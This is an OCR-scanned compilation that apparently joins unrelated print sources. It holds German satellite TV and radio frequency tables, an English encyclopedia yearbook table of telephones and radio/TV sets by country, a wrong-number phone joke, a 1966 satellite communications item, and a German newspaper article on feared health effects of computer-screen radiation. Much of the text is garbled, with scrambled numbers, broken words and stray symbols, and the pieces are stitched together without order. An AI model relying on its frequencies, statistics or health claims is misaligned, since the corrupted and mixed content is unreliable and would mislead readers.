Die Radioprogramme SKY ROCK, PACIFIC, RFM* sind im Audiobereich unter 4.80 MHz (handelsbliche SAT Empfnger und Stereo - Processoren verfgen normalerweise nur ber d e n Audioempfangsbereich von 4.80 bis 8.20 MHz) zu empfangen! ' RFM ist deshalb mit handelsblichen SAT-Receivern nur in Mono e m p fangbar.

"l

uf d e n Kanlen R I , R5, f j 6 w e r d e n zu verschiedenen ^ X ' ^

in S p a r t e n p r o g r a m m e (z.B. 1 x wchentlich Progr. fr rzte), abgestrahlt. Alle R a d i o p r o g r a m m e ZI.9 e i t e r ^ Meter-Schsseln m g l i c h s a t e l . i , e n e m p t n g e r n nicht m g l i c h

24 Stunden

f L ' r o

CL'
' * < *
t

U SAT-TV-PROGRAMMTABELLEN
Potata/ " ^ Dina- 7 ' Zentrum - ~;-?vbeschreibung ^ * StraNf. t ?
v

'

K-J

SAT-TV-Aussendungen Mitteleuropa (Fortsetzung)


"JSatellit I-V-F2 I-V-F2 I-V-F2 I-V-F2 I-V-F2 I-V-F2 Tel1-F1 Tel 1-F1 ,1 <\ * Pos 1.0W 1.0 W 1.0 W 1.0 W 1.0 W 1.0 W 8.0 W 8.0 W 8.0 W 8.0 W 8.0 W Tr-tfr ~ ^
71

SaleTJI Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F1 Eut 1-F4 Eut 1-F4 Eut 1-F2 Eut 1-F2 Eut1-F2 Eut 1-F2 Eut 1-F2 Eut1-F2 I-V-F2 1-V-F2 I-V-F2 I-V-F2 I-V-F2

POL'

Tr-Nr 1X(1) 3X(3) 4X(4) 4X(4) 6X(6j 1Y(7) 2Y(8) 3Y(9) 4Y(10) 6Y(12) 9 12Y 1 1X(1) 5X(5) 3Y(9) 4Y(10) 4Y(10) 36<20) 36(21) 38(24) WS WS WS WS WS WS ES WS WS WS WS WS EB EB ES EB WS WS G G G

frequenz _ i f BW .iland H-11.007 H-11.174 H-11.472 H-11.486 H-11.650 V-10.986 V. 11.091 V-11.140 V-11.507 V-11.674 V-11.181 V-11.654 H-10.972 H-11.009 H. 11.591 V-11.142 V-11.472 V-11.676 36 36 36 36 27 36 36 36 36 36 27 36 36 36 36 36 36 36

Audio. t. i Urtertrger i Ca. tji frequera j-EIRPWertJs Y Ton/Mono* ^T* rn Zertnin^ 6.60 MHz 6.65 MHz 6.65 MHz 6.65 MHz 6.65 MHz 7.02/7.20 MHz 47 dBW 47 dBW 47 dBW 47 dBW 47 dBW 47 dBW 45 dBW 47 dBW 47 dBW 47 dBW 44 dBW 46 dBW

Zentrum ^ H-11.178 V-11.160 V-11.595 RH-3.725 LH-3.900 RH-3.912 V-12.522 V-12.564 V-12.606 V-12.708 V-12.732 RH-3.675 RH-3.725 RH-3.725 RH-3.825 RH-11.541 RH-4.1665 RH-4.1885

ra^i. ~ i

r 30 30 30 20 30 20 30 30 30 30 30 40 36 36 36 36 20 20 30

frequenz

4beschrabuna ' . f t S

*r<

i "

> < Untertrger i - S & ^ W ^ V > JffaqiKn*. P f ^ W J digital 6.60 MHz 6.60 MHz 6.20 MHz 6.80 MHz 5.50 MHz 5.80 MHz 5.80 MHz 5.80 MHz 5.80 MHz 5.80 MHz 7.00 MHz 7.50 MHz 7.50 MHz 7.50 MHz 7.50 MHz 6.60 oder 6.65 MHz 6.60 oder 6.65 MHz 6.65 MHz SC PC 3.99225 MHz SC PC 4.07183 MHz 6.60 oder 6.65 MHz 6.60 oder 6.65 MHz 44 dBW 44 dBW 44 dBW 22 dBW 30 dBW 22 dBW 52 dBW 52 dBW 52 dBW 52 dBW 52 dBW 46 dBW 32 dBW 32 dBW 32 dBW 42 dBW 21 dBW 21 dBW 42 dBW 21 dBW 21 dBW 21 dBW 21 dBW

13.0 E 13.0 E 13.0 E 13.0 E 13.0 E 13.0 E 13.0 E 13.0 E 13,0 E 13.0 E 10.0 E 10.0 E 7.0 E 7.0 E 7.0 E 7.0 E 7.0 E 7.0 E 1.0 W 1.0 W 1.0 W 1.0 W 1.0 W

RAI-Uno, Italien 3Sal, BRD. sterreich/Schweiz TV5. Frank/eich Worldnet, USA + Sweden Today Sky Channel. Arts Channel, UK Stereo SIC:

63(4W) WS 71(2E) ES 79 ES

bveriges Telewsion SVT-2. Schweden Israel Cable TV Israel TV-2 TVGabon AFRTS-Sd-Europa Sender Tele-Sahel, Niger M6 Frankreich Ogitaler Business Service/Frankreich La Cinq, Frankreich zeitw. Video digitale Audiokanle I Programma Interspulnik, zeitw. Video Interspulnik. zeitw. Video einschl. Vremya Interspulnik, zeitw. Video einschl. TV Cubana zeitw. Video-Tests, USSR zeitw. int. Video versch. zeitw. int. Video versch. zeitw. int. Video. Lario. Italien Test-Sendungen TV Sudan TV Zaire zeitw. int. Video versch. zeitw. int. Video versch.

11(01) EH 53(10) Z/NE 13(10) EH R1(1) R2(2) R3(3) R5(5) R6(6) S G S G/S G S G G G S

Teleclub, Schweiz/BR Deutschland 6.50 MHz RTL plus, BR Deutschland Filmnet, Belgien Sat 1, BR Deutschland Super Channel, UK, Stereo S/C: NRK, Norwegen TVE, Spanien Eurovision, EBU Eurovision, EBU Worldnet. USA Eurovision, EBU Business TV Network Visnews zeitw. Video Azoren, USA & Kanada Brightstar, USA wechselt auf anderen Intelsat AFRTS, USA IntoFilm, Norwegen Sveriges Television SVT-1. Schweden 6.65 MHz 6.60 MHz 6.65 MHz 6.65 MHz 7.02/7.20 MHz C-MAC 6.60 MHz

Tel 1-F1 Tel 1-F1 Tel I-FI Gor 7 Gor 7 Gor 12

11.0 W 6(-1) 11.0 W 7(1) 14.0 W 7(1) 14.0 W 9(6) 14.0 W L7

Sound in Sync. 39 dBW Sound in Sync. 39 dBW

Gor 12 6.60 MHz 47 dBW Gor 12 Sound in Sync. 39 dBW I-V-F6 6.60 MHz 6.60 MHz 6.65 MHz 6.60 MHz 6.80 MHz 6.60 MHz digital 47 dBW I-V-F6 47 dBW 22 dBW 22 dBW 26 dBW 1-VA-F10 63(2W) WS 61(3W) WS H-11.015 H-11.133 30 30 43 dBW 44 dBW I-VA-F10 I-V-F6 I-IVA-F4 I-IVA-F4

18.5 W 38(23) G 18.5 W 38(24) G 18.5 W 71(1 E) ES 72(2E) 21.5 W 7B(13) EH 21.5 W 9B(17) EH 24.5 W 38(23) G 24.5 W 38(24) G

RH-4.08575 20 RH-1.10425 20 RH-4.1750 30

V-10.995/ V-11.135 & V-11.175

RH-3.96575 18 RH-4.04575 18 RH-4.1665 RH-4.1885 20 20

J f L T O C L Z J SAT-TV-PROCRAMMTABELLEN

TL'FDci
iv-ZentAJffi. /V.'^^.-vivbeschreibung > "strani- > s RH-3.790 RH-4.0225 RH-4.0645 RH-4.095 LH-4.125 H-10.975 H-11.015* H-11.015 H-11.135 H-11.135 H-11.135 H-11.175 H-11.591 V-10.995 V-11.155 V-11.470 LH-3.9075 RH-3.9795 RH-4.1665 RH-4.1885 RH-3.7425 RH-3.798 RH-4.175 30 20 20 20 27 30 30 30 30 30 30 30 27 30 30 30 20 20 20 20 20 20 30 Worldnet, USA TV Libyen .

SAT-TV-Aussendungen Mitteleuropa
INTELSAT/EUTELSAT/TELECOM UND GORIZONT-DIENSTE IN DER ITU-REGION NR. 1
Sra & s ; ^trequenz : WH RH-3.875
Zentrum

U SAT-TV-PROGRAMMTABELLEN ,.. p., - Audiot % \ ,t ; ~ Pota^^fS""";'-' . U t rrg r" ***Ca ^ ' . ' net e"
Me u n rqez
I-VA-F11 I-VA-F11 I-VA-F11 I-VA-F11 27.5 W 21(04) EH 27.5 W 24(16) EH 27.5 W 25(18) EH 27.5 W 36(20) G 27.5 W 87(21) G 27.5 W 61(1W) WS 27.5 W 61 (2W) WS 27.5 W 61 (2W) WS 6.60 MHz 6.20 MHz SCPC 4.03723 MHz 6.60 MHz B-MAC 6.65 MHz 6.60 MHz 6.60 MHz 6.65 MHz 6.60 MHz 6.60 MHz 32 dBW 26 dBW 26 dBW 24 dBW 26.5 dBW 44 dBW 45 dBW 45 dBW 44 dBW 44 dBW 44 dBW 43 dBW

JV-Ton/Mono* - ' Z e n t i w i 'j

iy.- E PWr t' I - et R

Polartl/

Sala 1-V-F7

Fus. 66.0 E

,Tr.-Nr. 12(06)

. Beschreibung ** i -i 'BW Land ' 30 TV Algerien

Oienst

'

* "

>

'^requere .. >1K' SRP-VV1 SCPC @ 3896 MHz B-MAC 6.65 MHz 6.65 MHz B-MAC 6.8 MHz 6.65 MHz 6.60 oder 6.65 MHz 6.60 oder 6.65 MHz 6.65 MHz 6.65 MHz 22 dBW

NTA Channel 10, Lagos. Nigeria TV Nationale de Chile FBIS. USA MTV Europa Children's Channel, UK Premiere, UK Kindernet, Holland Lifestyle Screen Sport BBC 1/2 Sateiiiten-lnfo Service zeitw. Video, UK Cable Neivs Network/CNN. USA EBU-PVS, Washington D.C. TVE-1, Spanien TVE-2, Spanien zeitw. int. Video versch. zeitw. int. Video versch. TV Portugal TV Marocaine, Marokko ATC TV, Argentinien

I-V-F7 I-V-F7 I-V-F7 I-V-F5 I-V-F5 1-V-F5 I-VA-F12 I-VA-F12

66.0 E

69

WS WS WS WH

H-11.470 H-11.650 H-11.680 RH-3.708 V-11,155 RH-4.135 RH-4.1665 RH-4.1885

27 30 30 27 30 20 20 20

AFRTS Trkei TRT-1 Trkei TRT-2 Trkei SABC Sdafrika IRIB-Iran zeitw. Video zeitw. int. Video versch. zeitw. int. Video versch.

42 dBW I-VA-F11 42 dBW I-VA-F11 42 dBW I-VA-F11 33 dBW I-VA-F11 44 dBW 21 dBW 21 dBW 21 dBW 47 dBW 47 dBW

66.0 E 69 66.0 E 69 63.0 E 63.0 E 11(01)

71 (2E) ES G G G

I-VA-F1 1 27.5 W 63(3W) WS I-VA-F11 I-VA-F11 I-VA-F11 I-VA-F11 I-VA-F11 I-VA-F11 l-VA-Fl 1 I-V-F4 I-V-F4 I-V-F4 27.5 W 63(3W) WS 27.5 W 63(3W) WS 27.5 W 63(4W) WS 27.5 W

63.0 E 37(23) 60.0 E 38(23) 60.0 E 38(24)

6 65 MHz
B-MAC 6.65 MHz 6.65 MHz 6.60 MHz 6.65 MHz 6.60 MHz 6.60 oder 6.65 MHz 6.60 oder 6.65 MHz 6.65 MHz SCPC 6.65

I-VA-F12 I-VA-F12

60.0 E 60.0 E

61(1W) WS 61 (2W) ws 63(3W) WS

H-10,974 H-11.010

30 "3-SAT, BR Deutschland 30 WDR3 - WDF Kln. BR Deutschland Tele 5, BR Deutschland Bayerisches Fernsehen BR Deutschland Eins Rus, ARD, BR Deutschland EUREKA, BR Deutschland

6(/W W 956 ) S

27.5 W 71(1 E) ES 27.5 W 73(2 E) ES 27.5 W 79(3 E) ES 34.5 W 53(10) Z/NE 34.5 W 24(14) EH 34.5 W 38(23) G 34.5 W 38(24) G 53.0 W 21(02) EH 53.0 W 25(05) EH 53.0 W 38(24) G

46 dBW 46 dBW 41 dBW 21 dBW 23 dBW 21 dBW 21 dBW 26 dBW 24 dBW 26.5 dBW

I-VA-F12 I-VA-F12

60.0 E

H-11.137 H-11.173

30 30

6.65 MHz 6.65 MHz

47 dBW 45 dBW

60.0 E 63(4W) WS

I-VA-F12 I-VA-F12 I-VA-F12

60.0 E 60.0 E 60.0 E

69(5W) WS 69(6W) WS 79(3E) WS

H-11.549 H-11.600 V-11.495

30 30 27

6.65 MHz 6.65 MHz

48 dBW 44 dBW 44 dBW

AFRTSAFN B-MAC US-Sender in der BR Deutschland 1 Programma. USSR II Programma, USSR 7.0 MHz Pulse, Width, Modulation

I-V-F4 46 dBW I-V-F3 32 dBW I-V-F3 I-V-F3

Gor 11 Gor 11

53.0 E 53.0 E

m
10(9)

S NH

RH-3.675 RH-3.875

40 36

Sfrahlantesignalionerr G - Global: SG hamisphriseh: Z - Zone: S - Punkt/Spot: Z/NE - Zona Nordes; WS - Westspol: ES - Oslspoi; EH - si. HmispMre WH wMtl. Herirsehre; ES - Eurostrartl Polaritten: RH recntsareheod. zirkulr; LH linKsrehena. zirkofar; H Honzontal; V Verificai BW Bandbreite. SCPC - Trger pio Kana (Alie Trger-Frequenzen and in GHz angegeben). ' impfte auch separare bslen

lr Auio-UmnriQf in Steeo sovwe Audio-Uniertrger lui Hrtunkprogramrre)

SIC

^ M X
SAT-RADIOPROG RAMME

/ / L T O i) CL '
U SAT-PADIOPROGRAMME

DIE SATELLITEN UND IHRE PROGRAMME

Radioprogramme im Satband 10,95 -11,7 GHz und 12,5 -12,75 GHz (Telecom)
(alle aufgefhrten Hrfunkprogramme senden 24 Stunden tglich)
^ ^PROGRAMM BBC-WORLD BBC-WORLD BBC-WORLD BBC-WORLD CABLE ONE DEUTSCHLANDFUNK . '" SPRACHE ENGLISCH VERSCHIEDEN* ENGLISCH VERSCHIEDEN* ENGL./HOLLND. DEUTSCH DEUTSCH ENGL./HOLLND. DEUTSCH ENGLISCH ' % SATELLIT .j^.-ir'-r --.. -TV-TRANSPONDER^ J . . SUPER SUPER BBC1-2 BBC1-2 3SAT *' WDF 3 RTL PLUS FILMNET SAT 1 SAT 1 CHANNEL CHANNEL F. DNEMARK F. DNEMARK POLARISATION VERTIKAL VERTIKAL HORIZONTAL HORIZONTAL HORIZONTAL HORIZONTAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL ; FREQUENZ . .GHz ; , . - ; 11,674 11,674 11,175 11,175 11,174 11,010 11,091 11,140 11,507 11,507 ' TONFREQUENZ (MHz) 7.380 7.560 7,020 7,200 MONO MONO MONO MONO ? - TONART WEGENER WEGENER WEGENER WEGENER WEGENER WEGENER WEGENER WEGENER WEGENER WEGENER

(5

SERVICE SERVICE SERVICE SERVICE

EUTELSAT 1-F1, 13" OST EUTELSAT 1-F1, 13 OST INTELSAT VA-F1I. 27.5" WEST INTELSAT VA-F11, 27,5 WEST EUTELSAT 1-F1. 13 OST INTELSAT VA-F12, 60 OST EUTELSAT 1-F1, 13 OST EUTELSAT 1-F1, 13 OST EUTELSAT 1-F1. 13 OST EUTELSAT 1-F1, 13 OST

m O)

7,560 & 7,740 STEREO 7,020 & 7.200 STEREO 7,020 & 7,200 STEREO 7,920 STEREO

RADIO LUXEMBURG .Q N C RADIO TEEN 3 i STAR SAT RADIO MNCHEN VOICE OF AMERICA

7,380 8, 7.560 STEREC 7.020 8. 7.200 STEREO

AQUARELLE RTL EUROPE 1 "N" EUROPE 2 I o in rv. AFP CJ \ RADIO NOSTALGIE tfl Ol ^ PACIFIC FM a SKY ROCK c IS FUN FM CT aj RFM NRJ-RADIO ENERGIE RMC KISS FM

FRANZSISCH FRANZOSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH FRANZSISCH

TELECOM 1A. 8 WEST TELECOM 1A, 8 WEST TELECOM 1A. 8 WEST TELECOM 1A, 8 WEST TELECOM 1A. 8 WEST TELECOM 1A. 8 WEST TELECOM 1A. 8 WEST TELECOM 1A, 8 WEST TELECOM 1A, 8" WEST TELECOM 1A. 8 WEST TELECOM 1A. 8 WEST TELECOM 1A, 8" WEST TELECOM 1A, 8 WEST

M6 M6 M6 LA CINQ LA CINQ LA CINQ

VERTIKAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL / / /


1 1 I

12.522 12.522 12,522 12.606 12.606 12.606 12.648 12.648 12.648 12.648 12.648 12.648 12.648

6.200 8. 7.400 STEREO 6.500 & 7.750 STEREO 6.850 & 8.200 STEREO 6.200 & 7.400 STEREO 7.750 MONO

6.850 & 8.200 STEREO 2.700 & 6.150 STEREO 3.600 8. 4.200 STEREO 4.950 8, 5.800 STEREO 1 L. 2.350 8. 5.350 STEREO 6.850 St 8.200 STEREO 6.200 8. 7.400 STEREO 6.850 & 7.750 STEREO

fi

VERTIKAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL VERTIKAL

^ Ji
f^Ni

* einige Stunden tglich auch in deutscher Sprache: Es werden aucft noch 2 norwegische Programme ber uteisat I-F2. 7 Ost aogestrahrt. jedoch in MAC-DIGITAL.

Countries Having Mors than 1 0 0 , 0 0 0 Telephones


Telephone! in service, 1965

Table II. Radio a n d Television 1,000 1966 Receivers per

( oo partially e tm l d Dl si oe )
TelePercent- phonos per age in. 100 Number crease papulaover ot telephones 1955 tion 5,528,751 171.4 12,250,841 331.6 232,901 446.1 121,066 725.072 107*? 146,684 35.0 2,180,273 113.5 962,596 94.0 868,592 51.7 120,525 172.8 132,367 107,7 151,593 182.0 1,193.362 184.1 521,921 125.6 186,948 211.8 426,502 1,133,331 725 2,526,843 154.7 3,386,925 61.5 2,131,521 86.7 308,100 111.9 7,200,000 140.8 301,405 9,960,000 53.6 88,785,000 68.1 189,500 65.8 260,228 149,0 369,844 130.3 10.54 12,54 0.83 1.31 1.80 1.12 17.85 36.52 23.42 0.12 1.15 0.48 3.81 5.72 7.20 2.25 6.40 8.03 44.01 35.97 0.99 3.14 1.03 18.27 45.88 7.02 3.04 1.91

Country Algerio Argentina Australia Austria Belgium Brazil Bulgaria Canada Chile China, Communist* Colombia Cuba Czechoslovakia Denmark Finland Formosa Franco Germany, East G e r m a n y , West Greece Hong Konff Hungary India Indoneiia Iran Ireland Israel

Number ol telephones 139,473 1,472,132 2,670,212 936,207 1.468,144 1,263,072 248.900 7,021,000 249,582 244,028 409,58? 228,687 1,398,50 1,310,746 778,101 147,825 5,703,878 1,586,838 8,168,188 431,292 219,693 538,608 760,000 204,335 181,130 203,900 215,020

PerTelecent- phones age per in100 crease popover ula1955 tion 35.4 36.3 80.9 95.3 76.8 71.4 81.9 67.1 150*0 60.6 97.8 51.5 79.7 250.2 93.6 60.0 121.6 254.6 279.0 65.1 209.2 180.4 207.0 83.5 226.0 1.13 6.64 23.98 12.99 15.57 1.60 3.04 36.12 2.89 0.05 2.63 3.08 9.91 27.46 16.92 1.21 11.71 9.33 13.93 5.06 5.87 5.31 0.16 0.19 0.78 7.14 8.51

Papulation, Selected Country Afghanistan Algeria Argentina A w i r olio 'Auslria Belgium Bolivia Brazil Bulgaria Burma

Countries Radio* TV

Country Italy Japan Korea, South Malaysia Mexico Morocco Netherlands N e w Zealand Norway Pokistan Peru Philippines Poland Portugal Puerto Rico Rumania South A f r i c a Spain Sweden Switzerland Turkey U.S.S.R. United A r o b Republic United Kingdom United States Uruguay Venezuela Yugoslavia

Ceh s v k z c ooaa l i
Welt am Draht: Im Juli 1986 waren 41,2 Mio. amerikanische Haushalte (47,8%) an ein Kabelnetz angeschlossen. Ein Jahr zuvor waren es noch 5 % weniger.

1948. Source! American Telephone and Telegraph

Tfc World's Telephones,

1955 and 965.

When you use the phone don't ever waste a wrong number. For instance, if someone calls up and says, "Is Jack there?" don't say, "I'm sorry, you have the wrong number." Say, "Hang on, I'll see. Who's calling?" Then wait a second. " I ' m sorry. Jack doesn't want to talk to you. Jack is still very angry with you, , and he doesn't want to discuss it."

ENCYCLOPEDIA

BRITANNICA

20 ; 173 13.7 317 66.1 662; 2U.1 317 100,4 421153.8 200 11829.5 170 22.8 13 63 Canada 602 25. Ceylon .37 Chile 291 China 7 .13 Colombia 221 22.1 Congo 13 0.03 Cuba 166 63.8 Cyprus 226 24.1 232 157.8 Denmark 357 226.8 Ecu rid oc 17V t. S I lliln|iiii J.IV 7.1 Tmluud 389 15B.1 Formosa 111 5.0 Frone 387 132.6 G e r m a n y , East 355 188.7 G e r m a n y , W e i l 337 122.4 Gliona 65 0.10 Greece 165 .41 Hungary 246 81.8 India . 10 Indonesto 27 0.45 Iran 91 4.5 Iraq 121 20.6 Israel 235 5.7 Italy 212 120X1 Japan 334 202.6 Kenya 53 1.1 Korea, N o r l h 13 Korea, South 52 Kuwait 265 79.9 Lebanon 143 59.4 Molayjia 73 12:2 Mexico 107 28.8 Morocco 53 23.3 Netherlands 291 180.9 N e w Zealand 523 154.2 Nigeria 17 0.52 Norway 482 131.1 Pakistan 11 0.O2 Panoma 373 58.3 Peru 142 18.3 Philippine 60 5.4 Poland 145 65.7 Portugal 161 19.6 Rhodesia 35 9.0 Rumonia 99 23.4 South A f r i c a 174 Spain 251 54.'? Sudan 22 0.7 Sweden 398 267.7 Switzerland 459 105.8 Syria' 195 12.9 Tanzania 14 Tbailond 82 8.2 Tyniiio 86 1.2 Turkey 83 0.04 U.S.S.R. 160 40.4 U.A.R. 166 14.0 U.K. 459 275.6 U.S. 1,174 357.4 Uruguay 240 67.3 Venezuelo 288 60.9 Vietnam, Soulh 31 Zambia 56 2.7 Does not Include w i r e d speokers. S o u r c e , U.S. lnforma,ion A g e n c y , Research a n d erence Service.

. .

Cmoa o bd i

V.8

.8

T V panel discussing nuclear weapon c o n t r o l on CBS via E a r l y

Bird State

Telecommunications
Major jfcided: developments (1) the start in of communications worldwide by in 1966 incommercial communications fctcrnationally Corp.; Idlicts lilogy l^thods lauislate |ato l o w e r llooil (2) services owned progress offered the U.S.-controlled, S a t e l l i t e the serious tech-

c o m m u n i c a t i o n s s a t e l l i t e on M a r c h 1 , 1 9 6 6 . L e f t , m o d e r a t o r E r i c S e v a r e i d in N e w Y o r k C i t y ; t o p l e f t , B r i t i s h M i n i s t e r o f L o r d Chalfont in Geneva; t o p r i g h t , French A i r Force Gen. P. Gallois ( r e t i r e d ) i n P a r i s ; b o t t o m l e f t , f o r m e r W e s t S e n . R. K e n n e d y i n W a s h i n g t o n , D.C. German U.S. Defense M i n i s t e r F, S t r a u s s in M u n i c h ; a n d b o t t o m r i g h t ,

C o m m u n i c a t i o n s in solving some of

Table see

Tennis: Record

Sporting

involved of

in imposing

the revolutionary on first the

Taiwan: tee see Formosa

satellite

communications (3) the

existing to

of communications', the economies of

attempts

Tariffs*. Commercial Policies; Taxation: see Government Finance Tea: see Agriculture Trade. International

satellite (4)

communications start of a na-

international in the

rates; over

the

debate

U.S.

financing

educational from de-

television, possibly the use of on

through

economies satellites;

expected (5) heavy

communications communications

mands

technology

for

meeting in to

the requirements of the U.S. involvement in the war South Vietnam; aircraft and and (6) ship progress on new systems and

improve gation.

communications

navi-

Strahlende Computer
Von Carola Schewe
Ursulalrlearbeiteteaushilfsweise drei Stunden tglich an einem Computerbildschirm. Nach vier W o c h e n litt sie pltzlich unter Schlaflosigkeit, Herzrhythmusstrungenund seltsamen Hautausschlgen nach dem Duschen. Sie gab den Zusatzverdienst wieder a u f und die Beschwerden verschwanden. Jetzt frchtet sie, ihren angestammten Arbeitsplatz auch aufgeben zu mssen: auch dort werden demnchst Bildschirme installiert. Nach einer Odyssee vom Haus- zum Zahnarzt, ber den Internisten z u m Nervenarzt ist ihr klar: ihr fehlt sonst nichts. Aber Bildschirmarbeit vertrgt sie nicht. Eine Berufsunfhigkeitsrente oder eine Entschdigung wegen einer Berufskrankheit darf sie aber nicht erwarten. Laut amtlicher Sprachregelung knnen Bildschirmarbeitspltze gar nicht krank machen. U n d wenn sie es doch tun? D i e Betroffenen machen E K G s und Allergietests, lassen sich V a l i u m und Psychotherapie aufschwatzen. A l l e Kolleginnen sehen ihre gesundheitlichen Strungen als persnliches Schicksal an und haben sich damit abgefunden", berichtet eine Datentypistin. Behandelnderzteuntersuchen Krperdetails die A u g e n , den Unterleib, die Nieren und verneinen dann jeden Z u s a m m e n h a n g mit den Arbeitsbedingungen. UrsulalrlehatsicheinerSelbsthilfegruppe angeschlossen, die vor einigen Monaten von der Maschinenbautechnikerin Ingeborg May-Steinhausen gegrndet wurde. Sie hatte teilweise ganztags am CAD-Bildschirm gezeichnet und Nieren- und Blasenbeschwerden davongetragen. I m Gegensatz zu vielen anderen suchte sie die S c h u l d " fr ihre Krankheit nicht bei sich, sondern in ihren Arbeitsbedingungen. U n d sie fand sich auch nicht ab. Sie kndigte. Seit 2 6 Jahren bin ich im Arbeitsproze, ohne einen Tag arbeitslos gewesen zu sein. D a ich noch ca. 20 Jahre i m Berufsleben zu stehen habe, mchte ich alles tun, u m meinen Gesundheitszustand wieder herzustellen, ehe es zu spt ist", schrieb sie in dem Brief ans Arbeitsamt. Ihre Gutachten waren soberzeugend, da das Arbeitsamt den Kndigungsgrund anerkannte. Ein Przedenzfall. Bisher wurden hnliche Begehren i m m e r mit dem H i n w e i s auf den wissenschaftlichen Erkenntnisstand v o m Tisch gewischt. N o c h A n f a n g J u n i antwortete die Bundesregierung a u f eine Anfrage des SPD-Abgeordneten Urbaniak: Nach Kenntnis der Bundesregierung hat bisher weltweit keine der abgeschlossenen wissenschaftlichen Untersuchungen gesundheitsschdigende Auswirkungen der Bildschirmarbeit nachgewiesen". Das ist nicht falsch. Nachgewiesen, abgesichert durch eine gengend groe Anzahl menschlicher Probanden, ist noch gar nichts. W e r hat schon Interesse, einer Zukunftstechnologie nachzuweisen, da sie die Gesundheit beeintrchtigt? D i e Bundesregierungjedenfallsnicht. Sie behauptete zwar im letzten Jahr, auch das Arbeitsumfeld in Forschungsvorhaben zu neuen Technikeneinbeziehen zu wollen, lehnte aber jetzt eine spezielle Grofelduntersuchung ab. Das Institut fr Strahlenhygiene des Bundesgesundheitsamtes bestritt in diesem Jahr einen Zusammenhang zwischen Bildschirmarbcit und Schwangerschaftskomplikationen. U n d ganz aktuell uerte sich eine Ad-hoc-Arbeitsgruppe der Deutschen Gesellschaft fr Arbeitsmedizin e . V . (einem sehr konservativen Berufsverband): Bildschirmarbeit knne z w a r Haltungsprobleme und Sehstrungen mit sich bringen. Aber alle anderen Befrchtungen entbehrten jed e r G r u n d l a g e . Diese Grundlagen zu schaffen, istdasHauptanliegen des Informationsbros MaySteinhausen. ternationalen Erkenntnisstand z u m Thema Biologische Effekte elektromagnetischer Strahlung von Computer-Bildschirmen" zusammen und maen erstmals die konkreten Werte von 16 Homeund Personal-Computern. D a es einem nach Bildschirmarbeiten vor den Augen flimmert, da m a n nachts weniger sieht, da Daten-Tippsen unter verspanntem Nacken leiden das bestreitet heute kaum noch j emand. Aber schon bei der Frage der Rntgenstrahlung, die aus den Gerten austritt, scheiden sich dieGeister. Es gibt schwedische und kanadische Untersuchungen, die eine Gefhrdung von Ften und Schwangeren fr wahrscheinlich halten. Eine finnische Studie fand dafr keine Beweise. Aber die Langzeitwirkungen geringer Rntgenstrahlung sind nicht ausreichend erforscht. Seit die Diskussion darber gegen Ende der siebziger Jahre breites ffentliches Interesse fand, haben sich die Computerhersteller mit Erfolg bemht, die Rntgenstrahlung ihrer Gerte zu m i n i m i e r e n . D i e neuesten Forschungen i m Ausland und auch das Gutachten von Boikat und C o . beschftigen sich mit einer anderen Art von Strahlung: der elektromagnetischen , diealle elektrischen Gerte erzeugen. D i e Wechselstrme , die sie in menschlichen Krpern hervorrufen, sind sehr schwach niederfrequent und damit langweilig. A k u t passiert deshalb nichts Besonderes. Neben einem elektrischen Fhn zu stehen, lt einen j a auch nichtpltzlichkrank werden. Aber der sogenannte Elektro-Smog ist bereits ein vieldiskutiertes P r o b l e m : Menschen schlafenschlechtunter Hochspannungsleitungen; Herzschrittmacher versagen in der N h e von Starkstromkabeln; Suglinge werden unruhig neben Elektroherden. Bei Bildschirmen werden diese elektromagnetischen Felder gepulst, d .h. b i s z u sechzigMal inder Sekunde an- und ausgeschaltet. Das verstrkt deren W i r k u n g enorm. W e n n die Frequenz dieser elektromagnetischen Strahlung diejenige beeinflut, mit der die

sr

N 5r

I?

S ai S

-fc ct> IS g.Cb


cT > == C
CD

3 5 S

C> T

S 3 et t
S3 co Sr r tea C5 /

=3 co ir cc. e*: Cc f ^ so

<3 cu- Cb"

Co" HS. %

t!
Cg cv C D C? c d =3'
c= C> t rrr c/i ct> I 2 Vs

D i e A n f r a g e des Abgeordneten und der harsche Ton der Arbeitsm e d i z i n e r h a b e n d e n gleichen Anla: Es gibt ein neues Gutachten, das die festgefahrene Diskussion wiederin Schwungbringt. D r . Ute Boikat, Richard Donderer u n d Roland Kollert stellten im Auftrag einer Computerzeitschrift den in-

Liebesgre per Diskette, strahlende Gesichter ein Bildschirmarbeitsplatz


Zellmembranen im Krper miteinander flstern", knnen die Zellen in ihrer Funktion gestrt werden. uerlich mebar ist dann der Verlust von Calcium aus den Zellen. Kalk ist fr die Reizbertragung uerst wichtig. W i e die Strungen ablaufen, und ob elektromagnetische Strahlung etwa auch Krebs hervorru fen kann, erforscht zur Zeit das USamerikanische National Council o f Radiation Protection". Und auch aus anderen Lndern, vor allem ausdem Ostblock, liegen Studien mit Anhaltspunkten dafr vor, da die Wirkung elektromagnetischer Strahlung schon bei Null beginnt. Anhaltspunkte dafr, da Bildschirmarbeit auf jeden Fall gefhrlich ist. Dies ist der Punkt, der die Arbeitsmediziner, die sich der Industrie verpflichtet sehen, sogarstig werden lt. Jeder Bildschirm sendet elektromagnetische Strahlung aus. Die meisten sorgen mit ihren elektromagneti sehen Entladungen auerdem fr ein regelrechtes Staubpartikel-Bombardement auf die Haut der Benutzerinnen ein weiteres Phnomen, dessen gesundheitliche Folgen noch nicht erforscht sind. Bei ihrem Warentest fanden Boikat/Donderer/Kollert keinen Computer, den sie bedenkenlos empfehlen knnten. Gute Werte in einem Mebereich wurden meist durch miserable in einem anderen zunichte gemacht. Strahlungsarme Bildschirme mit Flssigkristall- oder Plasma-Technik werden frhestens in sechs Jahren marktreif. Ein provisorischer Filter, Erdung und Ummantelung knnen allerdings die Strahlung um bis zu neunzig Prozent verringern. D r . Ute Boikat wei, mit welchen Gegnern sie es zu tun hat. Die greifen mich leidenschaftlich a n " , meint sie ein wenig furchtsam. Und sie findet auch, da ihre Ergebnisse nur ein Anfangseinknnen, um weiterzuforschen.

in der

Computerwerbung

Foto: taz-Archiv
zer/innenfreundlich sein. gestaltet

